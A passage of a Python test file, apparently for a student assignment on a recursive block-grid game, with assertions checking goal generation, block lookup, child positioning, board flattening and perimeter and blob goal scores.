if isinstance(goal[0], PerimeterGoal):
for i in goal:
assert isinstance(i, PerimeterGoal)
assert i.colour in colour
colour.remove(i.colour)
assert len(colour) == 0
if isinstance(goal[0], BlobGoal):
for ii in goal:
assert isinstance(ii, BlobGoal)
assert ii.colour in colour
colour.remove(ii.colour)
assert len(colour) == 0
def test_generate_goals_18() -> None:
goal = generate_goals(3)
colour = COLOUR_LIST.copy()
assert len(goal) == 3
if isinstance(goal[0], PerimeterGoal):
for i in goal:
assert isinstance(i, PerimeterGoal)
assert i.colour in colour
colour.remove(i.colour)
assert len(colour) == 1
if isinstance(goal[0], BlobGoal):
for ii in goal:
assert isinstance(ii, BlobGoal)
assert ii.colour in colour
colour.remove(ii.colour)
assert len(colour) == 1
def test_generate_goals_19() -> None:
goal = generate_goals(1)
colour = COLOUR_LIST.copy()
assert len(goal) == 1
if isinstance(goal[0], PerimeterGoal):
for i in goal:
assert isinstance(i, PerimeterGoal)
assert i.colour in colour
colour.remove(i.colour)
assert len(colour) == 3
if isinstance(goal[0], BlobGoal):
for ii in goal:
assert isinstance(ii, BlobGoal)
assert ii.colour in colour
colour.remove(ii.colour)
assert len(colour) == 3
# TODO: ~~~~~~ TASK 4 ~~~~~~ ~~~~~~ TASK 4 ~~~~~~ ~~~~~~ TASK 4 ~~~~~~
def test_get_block_20() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 3)
# Level 1
colours1 = [None, COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[3]]
set_children(board, colours1)
# Level 2
colours2 = [COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[0]]
set_children(board.children[0], colours2)
# level 3
# testings at level 0
assert _get_block(board, (0, 0), 0) == board
assert _get_block(board, (4, 94), 0) == board
assert _get_block(board, (9343, 32), 0) is None
assert _get_block(board, (750, 32), 0) is None
assert _get_block(board, (750, 0), 0) is None
assert _get_block(board, (750, 750), 0) is None
assert _get_block(board, (0, 750), 0) is None
# testings at level 1
assert _get_block(board, (0, 0), 1) == board.children[1]
assert _get_block(board, (4, 94), 1) == board.children[1]
assert _get_block(board, (321, 94), 1) == board.children[1]
assert _get_block(board, (375, 94), 1) == board.children[0]
assert _get_block(board, (375, 375), 1) == board.children[3]
assert _get_block(board, (750, 750), 1) is None
assert _get_block(board, (400, 750), 1) is None
assert _get_block(board, (400, 300), 1) == board.children[0]
assert _get_block(board, (833, 0), 1) is None
assert _get_block(board, (500, 400), 1) == board.children[3]
# testings at level 2
assert _get_block(board, (0, 0), 2) == board.children[1]
assert _get_block(board, (4, 94), 2) == board.children[1]
# assert _get_block(board, (375, 375), 2) == board.children[3] # TODO: THIS ASSERTION FAILED
assert _get_block(board, (375, 25), 2) == board.children[0].children[1]
assert _get_block(board, (375, 205), 2) == board.children[0].children[2]
assert _get_block(board, (375, 83), 2) == board.children[0].children[1]
assert _get_block(board, (375, 299), 2) == board.children[0].children[2]
assert _get_block(board, (400, 299), 2) == board.children[0].children[2]
assert _get_block(board, (600, 299), 2) == board.children[0].children[3]
assert _get_block(board, (600, 30), 2) == board.children[0].children[0]
assert _get_block(board, (600, 188), 2) == board.children[0].children[3]
assert _get_block(board, (563, 188), 2) == board.children[0].children[3]
assert _get_block(board, (563, 187), 2) == board.children[0].children[0]
assert _get_block(board, (600, 0), 2) == board.children[0].children[0]
assert _get_block(board, (943, 0), 2) is None
# above level 2
assert _get_block(board, (0, 0), 3) == board.children[1]
assert _get_block(board, (0, 0), 4) == board.children[1]
assert _get_block(board, (375, 25), 3) == board.children[0].children[1]
assert _get_block(board, (375, 205), 4) == board.children[0].children[2]
assert _get_block(board, (375, 83), 3) == board.children[0].children[1]
assert _get_block(board, (375, 299), 4) == board.children[0].children[2]
assert _get_block(board, (400, 299), 5) == board.children[0].children[2]
assert _get_block(board, (600, 299), 3) == board.children[0].children[3]
assert _get_block(board, (600, 30), 4) == board.children[0].children[0]
assert _get_block(board, (600, 188), 3) == board.children[0].children[3]
def test_get_block_21() -> None:
# level 0
board = Block((0, 0), 750, COLOUR_LIST[1], 0, 1)
# Level 1
# testings at level 0
assert _get_block(board, (0, 0), 0) == board
assert _get_block(board, (321, 34), 0) == board
assert _get_block(board, (84, 34), 0) == board
assert _get_block(board, (184, 303), 0) == board
assert _get_block(board, (4, 303), 0) == board
assert _get_block(board, (43, 33), 0) == board
assert _get_block(board, (9, 3421), 0) is None
assert _get_block(board, (750, 0), 0) is None
assert _get_block(board, (0, 750), 0) is None
assert _get_block(board, (92, 750), 0) is None
assert _get_block(board, (750, 750), 0) is None
assert _get_block(board, (750, 93), 0) is None
# above level 0
assert _get_block(board, (0, 0), 1) == board
assert _get_block(board, (321, 34), 2) == board
assert _get_block(board, (84, 34), 1) == board
assert _get_block(board, (184, 303), 2) == board
assert _get_block(board, (4, 303), 1) == board
assert _get_block(board, (43, 33), 3) == board
assert _get_block(board, (9, 3421), 5) is None
assert _get_block(board, (750, 0), 1) is None
assert _get_block(board, (0, 750), 2) is None
assert _get_block(board, (92, 750), 1) is None
assert _get_block(board, (750, 750), 1) is None
assert _get_block(board, (750, 93), 1) is None
def test_get_block_22() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], None, COLOUR_LIST[0], None]
set_children(board, colours)
# Level 2
colours1 = [COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board.children[1], colours1)
colours2 = [COLOUR_LIST[0], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[2]]
set_children(board.children[3], colours2)
# testing at level 0
assert _get_block(board, (1, 2), 0) == board
assert _get_block(board, (10, 22), 0) == board
assert _get_block(board, (10, 22), 0) == board
assert _get_block(board, (150, 22), 0) == board
assert _get_block(board, (250, 22), 0) == board
assert _get_block(board, (250, 220), 0) == board
assert _get_block(board, (163, 220), 0) == board
assert _get_block(board, (278, 89), 0) == board
assert _get_block(board, (500, 300), 0) == board
assert _get_block(board, (600, 300), 0) == board
assert _get_block(board, (520, 699), 0) == board
assert _get_block(board, (600, 700), 0) == board
assert _get_block(board, (500, 700), 0) == board
assert _get_block(board, (278, 300), 0) == board
# testing at level 1
assert _get_block(board, (500, 30), 1) == board.children[0]
assert _get_block(board, (10, 22), 1) == board.children[1]
assert _get_block(board, (10, 22), 1) == board.children[1]
assert _get_block(board, (150, 22), 1) == board.children[1]
assert _get_block(board, (250, 22), 1) == board.children[1]
assert _get_block(board, (500, 300), 1) == board.children[0]
assert _get_block(board, (600, 375), 1) == board.children[3]
assert _get_block(board, (520, 699), 1) == board.children[3]
assert _get_block(board, (600, 700), 1) == board.children[3]
assert _get_block(board, (500, 700), 1) == board.children[3]
# testing at level 2
assert _get_block(board, (1, 2), 2) == board.children[1].children[1]
assert _get_block(board, (10, 22), 2) == board.children[1].children[1]
assert _get_block(board, (10, 22), 2) == board.children[1].children[1]
assert _get_block(board, (150, 22), 2) == board.children[1].children[1]
assert _get_block(board, (250, 22), 2) == board.children[1].children[0]
assert _get_block(board, (250, 220), 2) == board.children[1].children[3]
assert _get_block(board, (163, 220), 2) == board.children[1].children[2]
assert _get_block(board, (278, 89), 2) == board.children[1].children[0]
assert _get_block(board, (278, 300), 2) == board.children[1].children[3]
assert _get_block(board, (500, 300), 2) == board.children[0]
assert _get_block(board, (600, 300), 2) == board.children[0]
assert _get_block(board, (520, 699), 2) == board.children[3].children[2]
assert _get_block(board, (499, 699), 2) == board.children[3].children[2]
assert _get_block(board, (60, 700), 2) == board.children[2]
assert _get_block(board, (600, 700), 2) == board.children[3].children[3]
assert _get_block(board, (10, 700), 2) == board.children[2]
assert _get_block(board, (500, 700), 2) == board.children[3].children[2]
assert _get_block(board, (563, 7), 2) == board.children[0]
# TODO: ~~~~~~ TASK 5 ~~~~~~ ~~~~~~ TASK 5 ~~~~~~ ~~~~~~ TASK 5 ~~~~~~
def test_update_child_pos_23() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[3]]
set_children(board, colours)
board._update_children_positions((375, 375))
assert board.position == (375, 375)
assert board.children[0].position == (750, 375)
assert board.children[1].position == (375, 375)
assert board.children[2].position == (375, 750)
assert board.children[3].position == (750, 750)
def test_update_child_pos_24() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 3)
# Level 1
colours1 = [None, COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[3]]
set_children(board, colours1)
# Level 2
colours2 = [COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[0]]
set_children(board.children[0], colours2)
# Nothing at level 3
board._update_children_positions((1000, 1000))
assert board.position == (1000, 1000)
assert board.children[0].children[0].position == (1563, 1000)
assert board.children[0].children[1].position == (1375, 1000)
assert board.children[0].children[2].position == (1375, 1188)
assert board.children[0].children[3].position == (1563, 1188)
assert board.children[1].position == (1000, 1000)
assert board.children[2].position == (1000, 1375)
assert board.children[3].position == (1375, 1375)
def test_update_child_pos_25() -> None:
# Level 0
board = Block((0, 0), 750, COLOUR_LIST[0], 0, 1)
board._update_children_positions((750, 750))
assert board.position == (750, 750)
assert board.children == []
def test_update_child_pos_26() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], None, COLOUR_LIST[0], None]
set_children(board, colours)
# Level 2
colours1 = [COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board.children[1], colours1)
colours2 = [COLOUR_LIST[0], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[2]]
set_children(board.children[3], colours2)
board._update_children_positions((1000, 1000))
assert board.position == (1000, 1000)
assert board.children[0].position == (1375, 1000)
assert board.children[2].position == (1000, 1375)
assert board.children[1].children[0].position == (1188, 1000)
assert board.children[1].children[1].position == (1000, 1000)
assert board.children[1].children[2].position == (1000, 1188)
assert board.children[1].children[3].position == (1188, 1188)
assert board.children[3].children[0].position == (1563, 1375)
assert board.children[3].children[1].position == (1375, 1375)
assert board.children[3].children[2].position == (1375, 1563)
assert board.children[3].children[3].position == (1563, 1563)
def test_update_child_pos_27() -> None:
# Level 0
board = Block((0, 0), 750, COLOUR_LIST[0], 0, 0)
board._update_children_positions((750, 750))
assert board.position == (750, 750)
assert board.children == []
# TODO: ~~~~~~ TASK 6 ~~~~~~ ~~~~~~ TASK 6 ~~~~~~ ~~~~~~ TASK 6 ~~~~~~
def test_flatten_28() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 3)
# Level 1
colours1 = [None, COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[3]]
set_children(board, colours1)
# Level 2
colours2 = [COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[0]]
set_children(board.children[0], colours2)
# Nothing at level 3
copy_board = board.create_copy()
assert id(copy_board) != id(board)
flatten_board = _flatten(board)
assert _flatten(copy_board) == [[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1]],
[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1]],
[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1]],
[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1]],
[COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3]],
[COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3]],
[COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[0], COLOUR_LIST[0], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3]],
[COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[0], COLOUR_LIST[0], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3]]]
assert flatten_board == [[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1]],
[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1]],
[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1]],
[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1]],
[COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3]],
[COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3]],
[COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[0], COLOUR_LIST[0], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3]],
[COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[0], COLOUR_LIST[0], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3]]]
def test_flatten_29() -> None:
board = Block((0, 0), 750, COLOUR_LIST[1], 0, 0)
copy_board = board.create_copy()
assert id(copy_board) != id(board)
flatten_board = _flatten(board)
assert flatten_board == [[COLOUR_LIST[1]]]
assert _flatten(copy_board) == [[COLOUR_LIST[1]]]
def test_flatten_30() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], None, COLOUR_LIST[0], None]
set_children(board, colours)
# Level 2
colours1 = [COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board.children[1], colours1)
colours2 = [COLOUR_LIST[0], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[2]]
set_children(board.children[3], colours2)
copy_board = board.create_copy()
assert id(copy_board) != id(board)
flatten_board = _flatten(board)
assert flatten_board == [[COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[0], COLOUR_LIST[0]],
[COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[0]],
[COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[1], COLOUR_LIST[3]],
[COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[0], COLOUR_LIST[2]]]
assert _flatten(copy_board) == [[COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[0], COLOUR_LIST[0]],
[COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[0]],
[COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[1], COLOUR_LIST[3]],
[COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[0], COLOUR_LIST[2]]]
def test_flatten_31() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board, colours)
copy_board = board.create_copy()
assert id(copy_board) != id(board)
flatten_board = _flatten(board)
assert flatten_board == [[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[0]],
[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[0]],
[COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[2], COLOUR_LIST[2]],
[COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[2], COLOUR_LIST[2]]]
assert _flatten(copy_board) == [[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[0]],
[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[0]],
[COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[2], COLOUR_LIST[2]],
[COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[2], COLOUR_LIST[2]]]
def test_flatten_32() -> None:
# Level 0
board = Block((0, 0), 750, COLOUR_LIST[2], 0, 2)
copy_board = board.create_copy()
assert id(copy_board) != id(board)
flatten_board = _flatten(board)
assert flatten_board == [[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2]],
[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2]],
[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2]],
[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2]]]
assert _flatten(copy_board) == [[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2]],
[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2]],
[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2]],
[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2]]]
def test_flatten_33() -> None:
# Level 0
board = Block((0, 0), 750, COLOUR_LIST[0], 0, 1)
copy_board = board.create_copy()
assert id(copy_board) != id(board)
flatten_board = _flatten(board)
assert flatten_board == [[COLOUR_LIST[0], COLOUR_LIST[0]],
[COLOUR_LIST[0], COLOUR_LIST[0]]]
def test_parimete_goal_34() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], None, COLOUR_LIST[0], None]
set_children(board, colours)
# Level 2
colours1 = [COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board.children[1], colours1)
colours2 = [COLOUR_LIST[0], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[2]]
set_children(board.children[3], colours2)
goal_1 = PerimeterGoal(COLOUR_LIST[3])
assert goal_1.score(board) == 5
goal_2 = PerimeterGoal(COLOUR_LIST[0])
assert goal_2.score(board) == 6
goal_3 = PerimeterGoal(COLOUR_LIST[1])
assert goal_3.score(board) == 1
goal_4 = PerimeterGoal(COLOUR_LIST[2])
assert goal_4.score(board) == 4
def test_parimete_goal_35() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 4)
# Level 1
colours = [COLOUR_LIST[3], None, COLOUR_LIST[0], None]
set_children(board, colours)
# Level 2
colours1 = [COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board.children[1], colours1)
colours2 = [COLOUR_LIST[0], COLOUR_LIST[1], COLOUR_LIST[3], None]
set_children(board.children[3], colours2)
# Level 3
colours3 = [COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[1], COLOUR_LIST[0]]
set_children(board.children[3].children[3], colours3)
goal_1 = PerimeterGoal(COLOUR_LIST[0])
assert goal_1.score(board) == 28
goal_2 = PerimeterGoal(COLOUR_LIST[1])
assert goal_2.score(board) == 6
goal_3 = PerimeterGoal(COLOUR_LIST[2])
assert goal_3.score(board) == 10
goal_4 = PerimeterGoal(COLOUR_LIST[3])
assert goal_4.score(board) == 20
def test_parimeter_goal_36() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board, colours)
goal_1 = PerimeterGoal(COLOUR_LIST[0])
assert goal_1.score(board) == 4
goal_2 = PerimeterGoal(COLOUR_LIST[1])
assert goal_2.score(board) == 0
goal_3 = PerimeterGoal(COLOUR_LIST[2])
assert goal_3.score(board) == 8
goal_4 = PerimeterGoal(COLOUR_LIST[3])
assert goal_4.score(board) == 4
def test_parimeter_goal_37() -> None:
# Level 0
board = Block((0, 0), 750, COLOUR_LIST[2], 0, 2)
goal_1 = PerimeterGoal(COLOUR_LIST[0])
assert goal_1.score(board) == 0
goal_2 = PerimeterGoal(COLOUR_LIST[1])
assert goal_2.score(board) == 0
goal_3 = PerimeterGoal(COLOUR_LIST[2])
assert goal_3.score(board) == 16
goal_4 = PerimeterGoal(COLOUR_LIST[3])
assert goal_4.score(board) == 0
def test_parimeter_goal_38() -> None:
# Level 0
board = Block((0, 0), 750, COLOUR_LIST[0], 0, 1)
goal_1 = PerimeterGoal(COLOUR_LIST[0])
assert goal_1.score(board) == 8
goal_2 = PerimeterGoal(COLOUR_LIST[1])
assert goal_2.score(board) == 0
goal_3 = PerimeterGoal(COLOUR_LIST[2])
assert goal_3.score(board) == 0
goal_4 = PerimeterGoal(COLOUR_LIST[3])
assert goal_4.score(board) == 0
def test_parimeter_goal_39() -> None:
# Level 0
board = Block((0, 0), 750, COLOUR_LIST[2], 0, 0)
goal_1 = PerimeterGoal(COLOUR_LIST[0])
assert goal_1.score(board) == 0
goal_2 = PerimeterGoal(COLOUR_LIST[1])
assert goal_2.score(board) == 0
goal_3 = PerimeterGoal(COLOUR_LIST[2])
assert goal_3.score(board) == 4
goal_4 = PerimeterGoal(COLOUR_LIST[3])
assert goal_4.score(board) == 0
# TODO: ~~~~~~ TASK 7 ~~~~~~ ~~~~~~ TASK 7 ~~~~~~ ~~~~~~ TASK 7 ~~~~~~
def test_blob_40() -> None:
# Level 0
board = Block((0, 0), 750, COLOUR_LIST[0], 0, 1)
flatten_board_1 = _flatten(board)
visited_1 = [[-1, -1], [-1, -1]]
goal_1 = BlobGoal(COLOUR_LIST[0])
assert goal_1._undiscovered_blob_size((3, 4), flatten_board_1, visited_1) == 0
assert goal_1._undiscovered_blob_size((3, 2), flatten_board_1, visited_1) == 0
assert goal_1._undiscovered_blob_size((0, 0), flatten_board_1, visited_1) == 4
assert goal_1._undiscovered_blob_size((0, 1), flatten_board_1, visited_1) == 0
assert goal_1._undiscovered_blob_size((1, 1), flatten_board_1, visited_1) == 0
assert goal_1.score(board) == 4
assert visited_1[0][0] == 1
assert visited_1[0][1] == 1
assert visited_1[1][0] == 1
assert visited_1[1][1] == 1
flatten_board_2 = _flatten(board)
visited_2 = [[-1, -1], [-1, -1]]
goal_2 = BlobGoal(COLOUR_LIST[1])
assert goal_2._undiscovered_blob_size((3, 4), flatten_board_2, visited_2) == 0
assert goal_2._undiscovered_blob_size((0, 0), flatten_board_2, visited_2) == 0
assert goal_2._undiscovered_blob_size((9, 0), flatten_board_2, visited_2) == 0
assert goal_2._undiscovered_blob_size((0, 1), flatten_board_1, visited_2) == 0
assert goal_2._undiscovered_blob_size((1, 0), flatten_board_1, visited_2) == 0
assert goal_2._undiscovered_blob_size((1, 1), flatten_board_1, visited_2) == 0
assert goal_2._undiscovered_blob_size((0, 0), flatten_board_1, visited_2) == 0
assert goal_2.score(board) == 0
assert visited_2[0][0] == 0
assert visited_2[1][0] == 0
assert visited_2[0][1] == 0
assert visited_2[1][1] == 0
flatten_board_3 = _flatten(board)
visited_3 = [[-1, -1], [-1, -1]]
goal_3 = BlobGoal(COLOUR_LIST[2])
assert goal_3._undiscovered_blob_size((3, 4), flatten_board_3, visited_3) == 0
assert goal_3._undiscovered_blob_size((0, 0), flatten_board_3, visited_3) == 0
assert goal_3._undiscovered_blob_size((2, -1), flatten_board_3, visited_3) == 0
assert goal_3._undiscovered_blob_size((0, 0), flatten_board_1, visited_3) == 0
assert goal_3._undiscovered_blob_size((0, 1), flatten_board_1, visited_3) == 0
assert goal_3._undiscovered_blob_size((1, 0), flatten_board_1, visited_3) == 0
assert goal_3._undiscovered_blob_size((1, 1), flatten_board_1, visited_3) == 0
assert goal_3.score(board) == 0
assert visited_3[0][0] == 0
assert visited_3[0][1] == 0
assert visited_3[1][1] == 0
assert visited_3[1][0] == 0
flatten_board_4 = _flatten(board)
visited_4 = [[-1, -1], [-1, -1]]
goal_4 = BlobGoal(COLOUR_LIST[3])
assert goal_4._undiscovered_blob_size((3, 4), flatten_board_4, visited_4) == 0
assert goal_4._undiscovered_blob_size((-2, 0), flatten_board_4, visited_4) == 0
assert goal_4._undiscovered_blob_size((1, 0), flatten_board_4, visited_4) == 0
assert goal_4._undiscovered_blob_size((0, 0), flatten_board_1, visited_4) == 0
assert goal_4._undiscovered_blob_size((0, 1), flatten_board_1, visited_4) == 0
assert goal_4._undiscovered_blob_size((1, 0), flatten_board_1, visited_4) == 0
assert goal_4._undiscovered_blob_size((1, 1), flatten_board_1, visited_4) == 0
assert goal_4.score(board) == 0
assert visited_4[0][0] == 0
assert visited_4[0][1] == 0
assert visited_4[1][1] == 0
assert visited_4[1][0] == 0
def test_blob_41() -> None:
# Level 0
board = Block((0, 0), 750, COLOUR_LIST[2], 0, 0)
flatten_board_1 = _flatten(board)
visited_1 = [[-1]]
goal_1 = BlobGoal(COLOUR_LIST[0])
assert goal_1._undiscovered_blob_size((3, 4), flatten_board_1, visited_1) == 0
assert goal_1._undiscovered_blob_size((3, 2), flatten_board_1, visited_1) == 0
assert goal_1._undiscovered_blob_size((0, 0), flatten_board_1, visited_1) == 0
assert goal_1._undiscovered_blob_size((0, 1), flatten_board_1, visited_1) == 0
assert goal_1._undiscovered_blob_size((1, 0), flatten_board_1, visited_1) == 0
assert goal_1._undiscovered_blob_size((1, 1), flatten_board_1, visited_1) == 0
assert goal_1.score(board) == 0
assert visited_1[0][0] == 0
flatten_board_2 = _flatten(board)
visited_2 = [[-1]]
goal_2 = BlobGoal(COLOUR_LIST[1])
assert goal_2._undiscovered_blob_size((3, 4), flatten_board_2, visited_2) == 0
assert goal_2._undiscovered_blob_size((-1, 2), flatten_board_2, visited_2) == 0
assert goal_2._undiscovered_blob_size((0, 0), flatten_board_2, visited_2) == 0
assert goal_2._undiscovered_blob_size((0, 1), flatten_board_2, visited_2) == 0
assert goal_2._undiscovered_blob_size((1, 0), flatten_board_2, visited_2) == 0
assert goal_2._undiscovered_blob_size((1, 1), flatten_board_2, visited_2) == 0
assert goal_2.score(board) == 0
assert visited_2[0][0] == 0
flatten_board_3 = _flatten(board)
visited_3 = [[-1]]
goal_3 = BlobGoal(COLOUR_LIST[2])
assert goal_3._undiscovered_blob_size((3, 4), flatten_board_3, visited_3) == 0
assert goal_3._undiscovered_blob_size((-1, 2), flatten_board_3, visited_3) == 0
assert goal_3._undiscovered_blob_size((0, 0), flatten_board_3, visited_3) == 1
assert goal_3._undiscovered_blob_size((0, 1), flatten_board_3, visited_3) == 0
assert goal_3._undiscovered_blob_size((1, 0), flatten_board_3, visited_3) == 0
assert goal_3._undiscovered_blob_size((1, 1), flatten_board_3, visited_3) == 0
assert goal_3.score(board) == 1
assert visited_3[0][0] == 1
flatten_board_3 = _flatten(board)
visited_3 = [[-1]]
goal_3 = BlobGoal(COLOUR_LIST[3])
assert goal_3._undiscovered_blob_size((3, 4), flatten_board_3, visited_3) == 0
assert goal_3._undiscovered_blob_size((-1, 2), flatten_board_3, visited_3) == 0
assert goal_3._undiscovered_blob_size((0, 0), flatten_board_3, visited_3) == 0
assert goal_3._undiscovered_blob_size((0, 1), flatten_board_3, visited_3) == 0
assert goal_3._undiscovered_blob_size((1, 0), flatten_board_3, visited_3) == 0
assert goal_3._undiscovered_blob_size((1, 1), flatten_board_3, visited_3) == 0
assert goal_3.score(board) == 0
assert visited_3[0][0] == 0
def test_blob_42() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 4)
# Level 1
colours = [COLOUR_LIST[3], None, COLOUR_LIST[0], None]
set_children(board, colours)
# Level 2
colours1 = [COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board.children[1], colours1)
colours2 = [COLOUR_LIST[0], COLOUR_LIST[1], COLOUR_LIST[3], None]
set_children(board.children[3], colours2)
# Level 3
colours3 = [COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[1], COLOUR_LIST[0]]
set_children(board.children[3].children[3], colours3)
goal_0 = BlobGoal(COLOUR_LIST[0])
assert goal_0.score(board) == 80
goal_1 = BlobGoal(COLOUR_LIST[1])
assert goal_1.score(board) == 16
goal_2 = BlobGoal(COLOUR_LIST[2])
assert goal_2.score(board) == 16
goal_3 = BlobGoal(COLOUR_LIST[3])
assert goal_3.score(board) == 64
def test_blob_43() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], None, COLOUR_LIST[0], None]
set_children(board, colours)
# Level 2
colours1 = [COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board.children[1], colours1)
colours2 = [COLOUR_LIST[0], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[2]]
set_children(board.children[3], colours2)
goal_0 = BlobGoal(COLOUR_LIST[0])
